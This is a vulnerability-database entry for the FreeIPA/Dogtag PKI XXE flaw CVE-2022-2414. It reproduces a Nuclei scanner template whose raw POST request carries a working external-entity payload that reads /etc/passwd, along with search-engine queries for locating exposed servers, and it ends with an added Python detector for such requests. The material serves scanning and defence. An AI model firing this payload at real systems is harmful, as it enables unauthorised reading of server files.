NUCLEI:CVE-2022-2414 (nuclei, ProjectDiscovery)
Aug 05, 2023 - 9:56 a.m.

FreeIPA - XML Entity Injection

2023-08-05 09:56:39
ProjectDiscovery
github.com

Tags: cve, cve2022, dogtag, freeipa, xxe, dogtagpki, xml, injection, security, http, remediation, entity

CVSS3: 7.5 High

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score: 7.4 High (Confidence: High)

EPSS: 0.039 Low (Percentile: 92.0%)

Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.

id: CVE-2022-2414

info:
  name: FreeIPA - XML Entity Injection
  author: DhiyaneshDk
  severity: high
  description: |
    Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the latest security patches and updates provided by the vendor to fix the XML Entity Injection vulnerability in FreeIPA.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/Dogtag/Dogtag%20PKI%20XML%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-2414.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2414
    - https://github.com/dogtagpki/pki/pull/4021
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-2414
    cwe-id: CWE-611
    epss-score: 0.01256
    epss-percentile: 0.84092
    cpe: cpe:2.3:a:dogtagpki:dogtagpki:10.5.18:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: dogtagpki
    product: dogtagpki
    shodan-query:
      - title:"Identity Management" html:"FreeIPA"
      - http.title:"identity management" html:"freeipa"
    fofa-query:
      - title="Identity Management"
      - title="identity management"
      - title="identity management" html:"freeipa"
    google-query: intitle:"identity management" html:"freeipa"
  tags: cve,cve2022,dogtag,freeipa,xxe,dogtagpki

http:
  - raw:
      - |
        POST /ca/rest/certrequests HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <!--?xml version="1.0" ?-->
        <!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
        <CertEnrollmentRequest>
          <Attributes/>
          <ProfileID>&ent;</ProfileID>
        </CertEnrollmentRequest>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: body
        words:
          - "PKIException"

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 400
# digest: 4a0a0047304502202e7ffe2984dc1d2a2a3b9f295743656980d146a512bebd2f660485641430f47a022100de7db647d6adc79aa3d8285c0fd9c6034f7eda696a613a144fd601578c83689f:922c64590222798bb761d5b6d8e72950
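
A defender-side check for the request this template sends, added here as an example and not part of the ProjectDiscovery template or the Dogtag code base: it flags XML bodies POSTed to /ca/rest/certrequests that declare a DOCTYPE or an external entity, including UTF-16 encoded bodies. The function names, finding labels, sample bodies and the premise that a legitimate enrollment request carries no DTD are assumptions.

```python
import re

# Endpoint and content type come from the template's request; everything else is assumed.
ENDPOINT = "/ca/rest/certrequests"
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC ... > : general or parameter external entity
EXT_ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(%\s+)?([^\s>]+)\s+(SYSTEM|PUBLIC)\s+([^>]*)>", re.IGNORECASE)
QUOTED_RE = re.compile(rb"\"([^\"]*)\"|'([^']*)'")

def _normalise(body: bytes) -> bytes:
    """Re-encode UTF-16 bodies (BOM present) so the byte patterns still match."""
    if body[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return body.decode("utf-16", errors="replace").encode("utf-8")
    return body

def inspect_request(method: str, path: str, content_type: str, body: bytes) -> list:
    """Return findings for one logged request; an empty list means nothing flagged."""
    if method.upper() != "POST" or path.split("?", 1)[0].rstrip("/") != ENDPOINT:
        return []
    if "xml" not in content_type.lower():
        return []
    data = _normalise(body)
    findings = []
    # Assumption: a legitimate enrollment request carries no DTD at all.
    if DOCTYPE_RE.search(data):
        findings.append("doctype-declared")
    for m in EXT_ENTITY_RE.finditer(data):
        literals = QUOTED_RE.findall(m.group(4))
        # The system identifier is the last quoted literal (PUBLIC has two).
        sysid = (literals[-1][0] or literals[-1][1]) if literals else b""
        kind = "parameter" if m.group(1) else "general"
        findings.append(
            f"external-{kind}-entity:{m.group(2).decode('utf-8', 'replace')}"
            f"->{sysid.decode('utf-8', 'replace')}")
    return findings

# Constructed samples: the first mirrors the template's request body, the second is benign.
SAMPLE_XXE = (b'<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>'
              b"<CertEnrollmentRequest><Attributes/><ProfileID>&ent;</ProfileID>"
              b"</CertEnrollmentRequest>")
SAMPLE_OK = (b"<CertEnrollmentRequest><Attributes/><ProfileID>caUserCert</ProfileID>"
             b"</CertEnrollmentRequest>")

if __name__ == "__main__":
    for body in (SAMPLE_XXE, SAMPLE_OK, SAMPLE_XXE.decode().encode("utf-16")):
        print(inspect_request("POST", ENDPOINT, "application/xml", body))
```

A hit here only shows that a request carried a DTD; whether the server expanded it depends on the parser configuration, which the vendor patch referenced above addresses.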
